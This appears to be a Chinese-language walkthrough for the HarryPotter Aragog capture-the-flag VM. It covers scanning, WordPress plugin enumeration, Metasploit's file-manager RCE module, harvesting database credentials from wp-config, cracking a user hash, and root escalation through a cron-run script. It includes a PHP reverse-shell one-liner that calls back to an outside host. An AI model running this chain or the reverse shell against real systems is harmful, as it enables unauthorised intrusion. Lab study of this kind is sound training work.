harrypotter1-aragog靶机攻略

harrypotter1

扫描

nmap

指纹

目录

渗透

找到了登录位置

看到wordpress就用wpscan扫一扫

复制代码
wpscan --url="http://10.4.7.153/blog" -e p --plugins-detection aggressive --api-token=d1fuMZc2tbhJWYk9VfNsl0GZlyYxkfH6bpL0pCKFhok

扫描出有这些file manager漏洞

使用msf搜一下这个漏洞

此处选择使用exploit/multi/http/wp_file_manager_rce

名字完全契合

配置完成后运行获取shell,注意要配置targeturi参数

使用该命令获取回显

复制代码
/usr/bin/script -qc /bin/bash /dev/null

在hagrid98的家目录下发现疑似密码文件

复制代码
horcrux_{MTogUmlkRGxFJ3MgRGlBcnkgZEVzdHJvWWVkIEJ5IGhhUnJ5IGluIGNoYU1iRXIgb2YgU2VDcmV0cw==}

解码结果如图

wordpress文件夹在etc下,进去看看发现config配置文件

得到数据库的用户信息

复制代码
root:mySecr3tPass

登入数据库

复制代码
mysql -uroot -p

在wordpress数据库的wp-users表中发现用户信息

复制代码
hagrid98:$P$BYdTic1NGSb8hJbpVEMiJaAiNJDHtc.

hash-identifier识别一下密码类型

拿去md5解密,得到

复制代码
hagrid98:password123

提权

ssh连接登录成功

在/opt文件夹下发现脚本文件,查看内容,是将下载内容复制到tmp路径下,该脚本可能为一个定时执行的任务

将该脚本文件更改为如图内容

进入/tmp增加一个php文件,将下面反弹命令写入

复制代码
<?php $sock=fsockopen("10.4.7.138",6789);exec("/bin/sh -i <&3 >&3 2>&3");?>

开启监听端口

等待一会提权成功

获取第二个

相关推荐
csdn_aspnet8 小时前
GitHub Actions自动化运维实战,用CI/CD流水线实现测试、部署、安全扫描一体化
运维·安全·ci/cd·自动化·github
2501_915106328 小时前
TraceEagle 代理抓包教程 本机和手机的 HTTPS 抓包方法
网络协议·计算机网络·网络安全·ios·adb·https·udp
ChainSafeAI00310 小时前
以太坊利用AI挖掘漏洞成功发现安全缺陷,称人工审核仍不可替代
人工智能·安全
世***y10 小时前
开展夏季安全大检查 排隐患夯实安全基础
安全
一键生成网站10 小时前
AI原型工具企业需求分析:私有化部署与安全协作选购指南
人工智能·安全·需求分析·
mounter62511 小时前
从内存隔离到运行时防线:透视 Linux 内核安全强化的博弈与演进
linux·网络·安全·linux kernel·kernel
chenyulin454513 小时前
企业微信API二次开发:万级并发回调下的极致幂等性设计与防重放架构实战
大数据·人工智能·安全·架构·企业微信
云水一下13 小时前
零基础玩转 bWAPP 靶场(五):HTML 注入——存储型(博客)
web安全·html·bwapp·存储型注入
CypressTel15 小时前
JADEPUFFER暴露企业安全防御新挑战——赛柏特安全观察
安全
上海云盾-小余16 小时前
流量攻击详解:区分带宽耗尽与资源耗尽两类攻击
爬虫·安全·ddos